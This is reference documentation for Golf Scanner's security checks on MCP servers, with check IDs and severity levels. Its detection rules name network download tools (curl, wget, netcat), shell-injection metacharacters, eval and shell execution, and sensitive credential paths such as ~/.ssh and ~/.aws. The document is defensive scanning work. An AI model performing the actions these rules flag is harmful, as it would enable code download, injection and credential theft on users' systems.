> ## Documentation Index > Fetch the complete documentation index at: https://docs.golf.dev/llms.txt > Use this file to discover all available pages before exploring further. # Security Checks > Complete reference for all 20 security checks run by Golf Scanner Golf Scanner runs 20 security checks against each MCP server. | Check ID | Name | Description | | --------------------------------- | ------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `type.detection` | Server Type | Classifies the server as package manager, container, binary, script, or HTTP based on command and transport. All other checks depend on its output. | | `universal.command_sanitization` | Command Safety | Detects dangerous patterns in command and args: privilege escalation, shell injection, network downloads, dynamic code execution, and temp path usage. | | `universal.credential_detection` | Credentials | Finds plaintext credentials in args, URLs, and environment variables — AWS keys, GitHub/Stripe/Anthropic/OpenAI tokens, JWTs, URL credentials, and sensitive env var names. | | `universal.registry.verification` | Registry Listing | Checks whether the server is listed in the official MCP Registry. | | `universal.github.trust` | GitHub Trust | Evaluates trust signals — archived status, last activity, license, stars, contributor count. Cross-validates repo URLs across sources. | | `script.location` | Script Location | Flags scripts running from unsafe locations like `/tmp` or home directories. | | `script.permissions` | Script Permissions | Detects world-writable scripts. | | `binary.location` | Binary Location | Evaluates binary path safety — system paths, `/opt`, home dirs, temp dirs, and unknown locations. | | `binary.permissions` | Binary Permissions | Detects world-writable or group-writable binaries. | | `container.isolation` | Container Isolation | Flags `--privileged` mode, dangerous capabilities (`SYS_ADMIN`), host namespace sharing, missing `--cap-drop`, and writable filesystems. | | `container.volumes` | Container Volumes | Flags dangerous volume mounts — root filesystem, `/etc`, Docker socket, SSH keys, cloud credentials, and kube config. | | `container.image` | Container Image | Checks whether images use digest pinning (`@sha256:`) vs mutable tags. Looks for Sigstore attestations. | | `container.registry.existence` | Container Registry | Verifies the container image exists in its OCI registry. Flags digest mismatches as possible tampering. | | `container.registry.signature` | Container Signature | Checks whether the image has a cosign signature with keyless/Fulcio certificates. | | `package.vulnerability` | Vulnerabilities | Queries OSV.dev for known CVEs and malware in npm/PyPI packages. Severity mapped from CVSS score. | | `package.typosquatting` | Typosquatting | Detects similarly-named packages that could indicate a typosquatting attack. | | `package.distribution` | Distribution | Evaluates package adoption — download counts and package age. | | `package.repository` | Source Repository | Checks whether the package links to a source repository. Cross-checks npm, PyPI, deps.dev, and MCP Registry. | | `package.unscoped_variant` | Unscoped Variant | For scoped npm packages (`@scope/pkg`): checks if the unscoped variant has known malware or vulnerabilities. | | `http.oauth` | OAuth | For public HTTP/SSE servers: discovers OAuth/OIDC configuration. Flags missing authentication and HTTP-only endpoints. | ## Check Applicability by Server Type Not all checks apply to all server types. The scanner automatically skips checks that don't apply and marks them as `skip` in findings. | Server Type | Applicable Checks | | --------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Package Manager** (npx, bunx, uvx...) | Server Type, Command Safety, Credentials, Registry Listing, Vulnerabilities, Typosquatting, Distribution, Source Repository, Unscoped Variant, GitHub Trust | | **Container** (docker, podman...) | Server Type, Command Safety, Credentials, Container Isolation, Container Volumes, Container Image, Container Registry, Container Signature, Registry Listing, GitHub Trust | | **Binary** | Server Type, Command Safety, Credentials, Binary Location, Binary Permissions, Registry Listing, GitHub Trust | | **Script** (python, node...) | Server Type, Command Safety, Credentials, Script Location, Script Permissions, Registry Listing, GitHub Trust | | **Public HTTP/SSE** | Server Type, Credentials, Registry Listing, GitHub Trust, OAuth | | **Local HTTP/SSE** | Server Type, Credentials | ## Checklist IDs Each finding includes a `checklist_id` in its `metadata` field. These IDs identify the exact sub-check that triggered the finding. ### ST — Server Type | ID | Severity | Description | | -------- | ----------- | ------------------------------------------------------- | | `ST-1.1` | skip | Package manager server detected | | `ST-1.2` | note | Container runtime (Docker, Podman) | | `ST-1.3` | note | Local binary | | `ST-1.4` | medium | Script-based server | | `ST-1.5` | medium | Unknown command — not recognized | | `ST-2.1` | medium | Local/private network server | | `ST-2.3` | note / high | Public server — note if HTTPS, high if unencrypted HTTP | | `ST-2.5` | high | Unreachable server — URL missing or invalid | ### UC-1 — Command Safety | ID | Severity | Description | | -------- | -------- | ------------------------------------------------------------------------------- | | `UC-1.1` | critical | Sudo / administrator privileges requested | | `UC-1.2` | critical | Shell injection metacharacters (`;`, `&&`, `\|\|`, `$(`, backtick, `${`) | | `UC-1.3` | high | Network download commands (`curl`, `wget`, `netcat`, `fetch`, `aria2c`, `axel`) | | `UC-1.4` | high | Shell execution (`bash/sh/zsh -c`) | | `UC-1.5` | high | Dynamic execution (`--exec`, `-e`, `eval`, `exec()`) | | `UC-1.6` | high | Temporary paths (`/tmp/`, `/var/tmp/`, `/dev/shm/`) | ### UC-2 — MCP Registry Verification | ID | Severity | Description | | -------- | -------- | ---------------------------------------- | | `UC-2.1` | note | Listed in Official MCP Registry (active) | | `UC-2.2` | high | Removed from Official MCP Registry | | `UC-2.3` | medium | Not listed in Official MCP Registry | ### UC-3 — GitHub Trust | ID | Severity | Description | | -------- | -------------------- | ---------------------------------------------------------------------------------------------------------- | | `UC-3.1` | note / medium / high | Repository trust evaluation — note if well-established, medium for limited trust signals, high if archived | | `UC-3.2` | high | Repository URL mismatch across sources (possible supply chain attack) | ### CD-1 — Credential Detection | ID | Severity | Description | | -------- | -------- | ---------------------------------------------------------------------------------------------------- | | `CD-1.1` | critical | Hardcoded credentials — AWS keys, GitHub/Stripe/Slack/Anthropic/OpenAI tokens, Google API keys | | `CD-1.2` | high | High-sensitivity tokens — GitLab PATs, JWTs | | `CD-1.3` | medium | Generic API key with common prefix (`sk-`, `api_`, `key_`, `token_`) or env var credential reference | | `CD-1.5` | critical | Credentials embedded in URL (`://user:pass@host`) | ### SC-1 — Script Location | ID | Severity | Description | | -------- | ----------- | ------------------------------------------------------------- | | `SC-1.1` | critical | Script in temporary location (`/tmp`, `/var/tmp`, `/dev/shm`) | | `SC-1.2` | medium | Script in user home directory | | `SC-1.3` | note / high | Location OK (note), or could not determine path (high) | ### SC-2 — Script Permissions | ID | Severity | Description | | -------- | ---------------------- | -------------------------------------------------------------------------------- | | `SC-2.1` | critical / high / note | World-writable (critical), permissions unavailable (high), permissions OK (note) | ### BN-1 — Binary Location | ID | Severity | Description | | -------- | -------- | ------------------------------------------------------------------ | | `BN-1.1` | note | Binary in protected system location (`/usr/bin`, `/usr/local/bin`) | | `BN-1.2` | medium | Binary in `/opt` directory | | `BN-1.3` | medium | Binary in user home directory | | `BN-1.4` | critical | Binary in temporary location (`/tmp`, `/var/tmp`, `/dev/shm`) | | `BN-1.5` | high | Non-absolute path or unknown location | ### BN-2 — Binary Permissions | ID | Severity | Description | | -------- | --------------- | ------------------------------------------------ | | `BN-2.1` | critical / note | World-writable (critical), permissions OK (note) | | `BN-2.2` | high | Group-writable binary | ### CT-1 — Container Isolation | ID | Severity | Description | | -------- | --------------- | ---------------------------------------------------------------------------- | | `CT-1.1` | critical / note | Runs with `--privileged` (critical), isolation OK (note) | | `CT-1.2` | critical | Dangerous capabilities added (`SYS_ADMIN`, `ALL`, `SYS_PTRACE`, `NET_ADMIN`) | | `CT-1.3` | critical | Shares host namespaces (`--pid=host`, `--network=host`) | | `CT-1.4` | medium | No `--cap-drop` to restrict capabilities | | `CT-1.5` | medium | Writable filesystem (no `--read-only`) | ### CT-2 — Container Volumes | ID | Severity | Description | | -------- | ----------- | -------------------------------------------------------------- | | `CT-2.1` | high / note | Root filesystem mounted (high), volume configuration OK (note) | | `CT-2.2` | high | Mounts `/etc` (system configuration) | | `CT-2.3` | high | Mounts Docker socket — container escape risk | | `CT-2.4` | high | Mounts sensitive credentials (`~/.ssh`, `~/.aws`, `~/.kube`) | ### CT-3 — Container Image Pinning | ID | Severity | Description | | -------- | -------- | ------------------------------------------ | | `CT-3.1` | note | Image uses SHA256 digest pinning | | `CT-3.2` | medium | Image uses mutable tag (not digest-pinned) | | `CT-3.3` | medium | Image uses implicit `:latest` tag | ### CT-4 — Sigstore Attestation | ID | Severity | Description | | -------- | -------- | ----------------------------- | | `CT-4.1` | note | Sigstore attestation verified | | `CT-4.2` | note | No Sigstore attestation found | ### CT-5 — Container Registry | ID | Severity | Description | | -------- | -------- | ------------------------------------------ | | `CT-5.1` | note | Image verified in registry | | `CT-5.2` | critical | Image digest mismatch — possible tampering | | `CT-5.3` | high | Image not found in registry | ### CT-6 — Container Signature | ID | Severity | Description | | -------- | -------- | ------------------------------------------- | | `CT-6.1` | note | Cosign signature detected | | `CT-6.2` | note | Keyless (Fulcio) signature with certificate | | `CT-6.3` | medium | No cosign signature found | ### PH-3 — OAuth / HTTP Auth | ID | Severity | Description | | -------- | -------- | ------------------------------------------------------------------ | | `PH-3.1` | critical | Public server returns data without authentication | | `PH-3.2` | note | Non-OAuth authentication detected (401/403 without OAuth metadata) | | `PH-3.3` | note | Server implements OAuth/OpenID Connect | | `PH-3.4` | high | No OAuth discovery endpoints and auth status undetermined | ### PM-1 — Package Vulnerabilities | ID | Severity | Description | | -------- | -------- | ------------------------------------- | | `PM-1.1` | critical | Critical vulnerability (CVSS ≥ 9.0) | | `PM-1.2` | high | High vulnerability (CVSS 7.0–8.9) | | `PM-1.3` | medium | Moderate vulnerability (CVSS 4.0–6.9) | | `PM-1.4` | note | Low vulnerability (CVSS \< 4.0) | ### PM-2 — Package Malware | ID | Severity | Description | | -------- | -------- | ---------------------- | | `PM-2.1` | critical | Known malware detected | ### PM-3 — Source Repository | ID | Severity | Description | | -------- | -------- | -------------------------------------- | | `PM-3.1` | critical | No source repository linked to package | | `PM-3.3` | note | Source repository verified | ### PM-5 — Typosquatting | ID | Severity | Description | | -------- | ----------- | ----------------------------------------------------------- | | `PM-5.1` | high / note | Similar package names detected (high), none detected (note) | ### PM-6 — Package Distribution | ID | Severity | Description | | -------- | -------------------- | -------------------------------------------------------------------------------------- | | `PM-6.1` | high / medium / note | Very low downloads (high), low downloads or young package (medium), adoption OK (note) | ### PM-8 — Unscoped Variant | ID | Severity | Description | | -------- | ------------- | -------------------------------------------------------------------------------- | | `PM-8.1` | high / medium | Malware in unscoped variant (high), vulnerabilities in unscoped variant (medium) |